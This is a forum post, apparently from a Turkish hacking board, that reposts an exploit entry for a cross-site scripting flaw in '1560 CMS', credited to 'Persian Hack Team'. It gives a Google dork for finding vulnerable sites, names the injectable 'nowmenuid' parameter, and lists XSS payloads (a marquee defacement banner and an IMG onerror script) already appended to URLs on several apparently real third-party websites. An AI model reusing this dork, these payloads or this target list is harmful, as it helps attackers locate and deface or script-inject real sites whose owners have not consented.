- Katılım
- 2 Ara 2015
- Tepki puanı
- 343
Rating - 0%
Kod:
#####################
# Exploit Title : 1560 CMS Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.1560.net/
# Google Dork : inurl:cp.php?cl=cp nowmenuid=
# Date: 2016/01/30
----
# PoC:
# nowmenuid=[XSS]
# Payload = <marquee><font color=lime size=20>xss by atawho</font></marquee>
#http://www.autokcan.com/cp.php?cl=cp&ppid=&catid=112098&nowmenuid=20110931<marquee><font color=lime size=20>atawho</font><IMG SRC=/ onerror="alert('a')"></img>
http://www.m-legend.com/cp.php?cl=cp&topid=45527&pid=0&catid=45527&nowmenuid=20001627&cpath=45527:http://www.autokcan.com/cp.php?cl=cp&ppid=&catid=112098&nowmenuid=20110931<marquee><font color=lime size=20>atawho</font><IMG SRC=/ onerror="alert('a')"></img>
http://www.devebuild.com/cp.php?cl=cp&nowmenuid=20111708
http://www.m-legend.com/cp.php?cl=cp&topid=45527&pid=0&catid=45527&nowmenuid=20001627&cpath=45527:
http://www.autokcan.com/cp.php?cl=cp&ppid=&catid=112098&nowmenuid=20110931<marquee><font color=lime size=20>atawho</font><IMG SRC=/ onerror="alert('a')"></img>
